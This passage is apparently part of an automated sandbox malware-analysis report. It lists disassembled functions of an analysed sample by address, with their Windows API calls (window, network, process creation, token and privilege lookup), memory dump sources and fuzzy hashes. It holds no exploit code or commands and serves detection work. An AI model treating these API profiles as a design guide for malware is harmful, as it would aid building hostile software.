Instruction ID: 74cd8ea399d31ef954cb52e2037b22cc07392b4ff980699f6e9bf2296ceb7dd0
Opcode Fuzzy Hash: f25b4501771fe682e795238042e4de442d4a8046ea90a96a289505f75d14eea2
Instruction Fuzzy Hash: F131AF31108305DFD704EF50C885ABABBF8AF85354F50482DF599862A1EB79AA49CB52

Function 007FC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623

GetCursorPos.USER32(?), ref: 007FC4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007AB9AB,?,?,?,?,?), ref: 007FC4E7
GetCursorPos.USER32(?), ref: 007FC534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007AB9AB,?,?,?), ref: 007FC56E

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: a808366b9f2186c550a42b4323ab5fd3977e1ca96f5ec4873463f7f9abd21dd9
Instruction ID: 6c6c60569cd6de31bf0d1c03cc62cb9a58290f811eab77c51d3060e4574ebfe4
Opcode Fuzzy Hash: a808366b9f2186c550a42b4323ab5fd3977e1ca96f5ec4873463f7f9abd21dd9
Instruction Fuzzy Hash: 8931913560005CEFCB168F58C898EBA7BB5FF49310F144469FA058B361CB39AD60DBA4

Function 007C8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C8121
Part of subcall function 007C810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C812B
Part of subcall function 007C810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C813A
Part of subcall function 007C810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8141
Part of subcall function 007C810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007C86A3
_memcmp.LIBCMT ref: 007C86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C86FC
HeapFree.KERNEL32(00000000), ref: 007C8703

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 00219e966128f15e59fc7ac549a5fd87204801b7e87510a2d5943d89f1230015
Instruction ID: 677bd1f7954c1edc46cb8ea3ae43bfd280f43ebf6cf8544880154b0a15980355
Opcode Fuzzy Hash: 00219e966128f15e59fc7ac549a5fd87204801b7e87510a2d5943d89f1230015
Instruction Fuzzy Hash: 1F216B71E00109EBDB10DFA4C949BEEB7B8EF44304F15805DE454A7242EB38AE05CB95

Function 0079098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 007909AE

Part of subcall function 00775A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D7896,?,?,00000000), ref: 00775A2C
Part of subcall function 00775A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D7896,?,?,00000000,?,?), ref: 00775A50

_fprintf.LIBCMT ref: 007909E5
OutputDebugStringW.KERNEL32(?), ref: 007C5DBB

Part of subcall function 00794AAA: _flsall.LIBCMT ref: 00794AC3

__setmode.LIBCMT ref: 00790A1A

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: cccaa23043d2cc602cb8b9eced120d119e3ce65093dae07e206780a2739e946c
Instruction ID: bcb7b8b0670cb3f9ed2ac986582eadf2250877707b8d0e59b01e3e5a7bd0f84d
Opcode Fuzzy Hash: cccaa23043d2cc602cb8b9eced120d119e3ce65093dae07e206780a2739e946c
Instruction Fuzzy Hash: E6112771904204EFDF04B7B4AC4EDBE7B68DF46360F108159F20957282EE6D5C5297E5

Function 007E1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007E17A3

Part of subcall function 007E182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007E184C
Part of subcall function 007E182D: InternetCloseHandle.WININET(00000000), ref: 007E18E9

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: cc59ad592fa6a690cde94c9a9b9885acfb5d9f78ee215c6a992271a831b3ac65
Instruction ID: dd130f93ca9993f25047d89539eda25162ccf85976908b5c14dd0391fb98048f
Opcode Fuzzy Hash: cc59ad592fa6a690cde94c9a9b9885acfb5d9f78ee215c6a992271a831b3ac65
Instruction Fuzzy Hash: 9621D431202641BFEB129F61CC02FBABBEDFF4C720F50402AFA1196650DB799811D7A0

Function 007D3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,007FFAC0), ref: 007D3A64
GetLastError.KERNEL32 ref: 007D3A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 007D3A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,007FFAC0), ref: 007D3ADF

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 9a47d84ce8844b9e9af7a579ef94577db5027b597c4b4f61e9ffb49dcc93ca6d
Instruction ID: d4a59a8233c502281801ed2b547c304d758b49da795ea6a80bc52e03f8f87dee
Opcode Fuzzy Hash: 9a47d84ce8844b9e9af7a579ef94577db5027b597c4b4f61e9ffb49dcc93ca6d
Instruction Fuzzy Hash: B62191746082019F8710EF28C88586A77F8BF56364F108A2BF499D73A1DB39DE45CB93

Function 007CDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 007CF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007CDCD3,?,?,?,007CEAC6,00000000,000000EF,00000119,?,?), ref: 007CF0CB
Part of subcall function 007CF0BC: lstrcpyW.KERNEL32(00000000,?,?,007CDCD3,?,?,?,007CEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 007CF0F1
Part of subcall function 007CF0BC: lstrcmpiW.KERNEL32(00000000,?,007CDCD3,?,?,?,007CEAC6,00000000,000000EF,00000119,?,?), ref: 007CF122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,007CEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 007CDCEC
lstrcpyW.KERNEL32(00000000,?,?,007CEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 007CDD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,007CEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 007CDD46

Strings

cdecl, xrefs: 007CDD3D

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: e4dac03a5f99cdbb1e00ff3fe753fa3fd437754a1cab41f4f346954a7d3f1b74
Instruction ID: caa2730bde4f4dcbd20f5f0bbbb00e63469aedb5f0e2f47163635e55dcd5d16b
Opcode Fuzzy Hash: e4dac03a5f99cdbb1e00ff3fe753fa3fd437754a1cab41f4f346954a7d3f1b74
Instruction Fuzzy Hash: FE11AC3A200305EBCB25AF74D849E7A77A9FF45710B40803EE906CB2A0EB799C51C7E4

Function 007A50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 007A5101

Part of subcall function 0079571C: __FF_MSGBANNER.LIBCMT ref: 00795733
Part of subcall function 0079571C: __NMSG_WRITE.LIBCMT ref: 0079573A
Part of subcall function 0079571C: RtlAllocateHeap.NTDLL(010B0000,00000000,00000001,00000000,?,?,?,00790DD3,?), ref: 0079575F

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: d3b14987374ba2c1c2ff1d09654f84eabbcbb65178327ac32034951a57027270
Instruction ID: f7e2693caca0e4b883153086ad2f25b9d9949672a349014e65f16ec533298f90
Opcode Fuzzy Hash: d3b14987374ba2c1c2ff1d09654f84eabbcbb65178327ac32034951a57027270
Instruction Fuzzy Hash: 8611C6B2505A19EECF313F74FC49B7E3798AF96361B24462AF90496251DE3C89408791

Function 007E6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00775A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D7896,?,?,00000000), ref: 00775A2C
Part of subcall function 00775A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D7896,?,?,00000000,?,?), ref: 00775A50

gethostbyname.WSOCK32(?,?,?), ref: 007E6399
WSAGetLastError.WSOCK32(00000000), ref: 007E63A4
_memmove.LIBCMT ref: 007E63D1
inet_ntoa.WSOCK32(?), ref: 007E63DC

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: e55e4071dedf5cb25a7a84b3f8dadd27702b0a26bf039794d763c324c00f1748
Instruction ID: cdf3e5469439c33eff4939d18986b3e8c95f853abd3a649e763c766c13ecbe89
Opcode Fuzzy Hash: e55e4071dedf5cb25a7a84b3f8dadd27702b0a26bf039794d763c324c00f1748
Instruction Fuzzy Hash: 8F115171901109EFCF04FBA4DD8ACAE77B8AF09360B148065F509A7261DF78AE14CB61

Function 007C8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 007C8B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C8BA4

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 447d9a743dcafb61bc28c2858f12661bc1092cf75db90b412c357d37a203f695
Instruction ID: abad0b46fd3e098d6e98da82c66376a0e3f80b39c0d25d9325b8bcb7d9b82650
Opcode Fuzzy Hash: 447d9a743dcafb61bc28c2858f12661bc1092cf75db90b412c357d37a203f695
Instruction Fuzzy Hash: 4E110AB9901218FFDB11DF95C885FADBB74FB48710F204099E900B7250DA716E11DB94

Function 00771290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623

DefDlgProcW.USER32(?,00000020,?), ref: 007712D8
GetClientRect.USER32(?,?), ref: 007AB5FB
GetCursorPos.USER32(?), ref: 007AB605
ScreenToClient.USER32(?,?), ref: 007AB610

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 6db029753583b34483aa4460192040b7d7b07bc03ab289153692d99a3fa24719
Instruction ID: 5fd96167e30aa2381bcf3018f308de8a153de809f12b696ff42ce2df0ea8f08b
Opcode Fuzzy Hash: 6db029753583b34483aa4460192040b7d7b07bc03ab289153692d99a3fa24719
Instruction Fuzzy Hash: 63112B36600119EBCF00DF98D8899BE77B8FF05340F408455FA05E7242CB38BA55CBA9

Function 00771D35 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00771D73
GetStockObject.GDI32(00000011), ref: 00771D87
SendMessageW.USER32(00000000,00000030,00000000), ref: 00771D91

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: a46de2eafa3815ec2279c01d2bdbe3b9b5aa23f3e3c1724d263330d5957e0155
Instruction ID: e3d4f7c259e98150c44822a85264c10bfb64d7493cd29a168784226df6c4c718
Opcode Fuzzy Hash: a46de2eafa3815ec2279c01d2bdbe3b9b5aa23f3e3c1724d263330d5957e0155
Instruction Fuzzy Hash: FF115E72601518BFDF119F94DC44EEABB69FF093A4F448115FA0856220CB799C60DFA0

Function 007CD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007CD84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007CD864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007CD879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007CD897

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 6f21e00130c462a0aeb62d8a43720e27b06b2199e7ae3f650d469bcc039a4363
Instruction ID: 5877cc6a83b2a775186fa4e5d2a392e08b220483973f7472ebc4d5c09aad7e67
Opcode Fuzzy Hash: 6f21e00130c462a0aeb62d8a43720e27b06b2199e7ae3f650d469bcc039a4363
Instruction Fuzzy Hash: 34113CB5605304EBE3308F50DC48FA2BBE8EF40B10F10857DAA16D6050D7B9E949EBA5

Function 007A6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 007A6FDB

Part of subcall function 007A76C2: __fltout2.LIBCMT ref: 007A76EB

__cftog_l.LIBCMT ref: 007A7001
__cftoe_l.LIBCMT ref: 007A7033

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 03645a884e2e81f7d18bd28082e562a17b58f3bf5e0fabec466267813b25cb5b
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 7A014B7654814AFBCF1A5F84CC05CEE3F66BB6A351B588615FA1858031D23AC9B2EB81

Function 007FB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 007FB2E4
ScreenToClient.USER32(?,?), ref: 007FB2FC
ScreenToClient.USER32(?,?), ref: 007FB320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007FB33B

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 649943f1c3e1cd43f524c4b3b77c04c16fb48bd34d6c7b3bc6a7b4ff75f254a1
Instruction ID: 9ee278eecf9a46571be93ba32b8a46f0322443cc192baf06dbbb1e26e14529b5
Opcode Fuzzy Hash: 649943f1c3e1cd43f524c4b3b77c04c16fb48bd34d6c7b3bc6a7b4ff75f254a1
Instruction Fuzzy Hash: 2B1143B9D00209EFDB41CFA9C8849EEBBB9FF08310F108166E914E3220DB35AA55CF54

Function 007FB635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007FB644
_memset.LIBCMT ref: 007FB653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00836F20,00836F64), ref: 007FB682
CloseHandle.KERNEL32 ref: 007FB694

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 9e322001e33cde49b6aeb8304aa4f1a57cd2db882c70d4e279e4217442e3087c
Instruction ID: 57d09343f05e8ea2fb7cfb6244f582ae6a362716a215976bf29974ab0f10749a
Opcode Fuzzy Hash: 9e322001e33cde49b6aeb8304aa4f1a57cd2db882c70d4e279e4217442e3087c
Instruction Fuzzy Hash: 2BF0F4B2640304BBE6102769BC05F7B7A5CFF45755F008421FB08E5192EB795C20C7B8

Function 007D6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 007D6BE6

Part of subcall function 007D76C4: _memset.LIBCMT ref: 007D76F9

_memmove.LIBCMT ref: 007D6C09
_memset.LIBCMT ref: 007D6C16
LeaveCriticalSection.KERNEL32(?), ref: 007D6C26

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 87141ddb72bb46d47b3236999fbb46cb54c50f444abab166f2d2a30ad57a42f2
Instruction ID: a9fb912b39af550c032b4722b52a918ec5741ce2ed142cac63ec66d90fc8deb2
Opcode Fuzzy Hash: 87141ddb72bb46d47b3236999fbb46cb54c50f444abab166f2d2a30ad57a42f2
Instruction Fuzzy Hash: CDF0303A200100FBCF056F55EC89A5ABB29EF45320B04C061FE085E227DB35E811CBB4

Function 007FBD1C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 007712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0077134D
Part of subcall function 007712F3: SelectObject.GDI32(?,00000000), ref: 0077135C
Part of subcall function 007712F3: BeginPath.GDI32(?), ref: 00771373
Part of subcall function 007712F3: SelectObject.GDI32(?,00000000), ref: 0077139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007FBD40
LineTo.GDI32(00000000,?,?), ref: 007FBD4D
EndPath.GDI32(00000000), ref: 007FBD5D
StrokePath.GDI32(00000000), ref: 007FBD6B

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
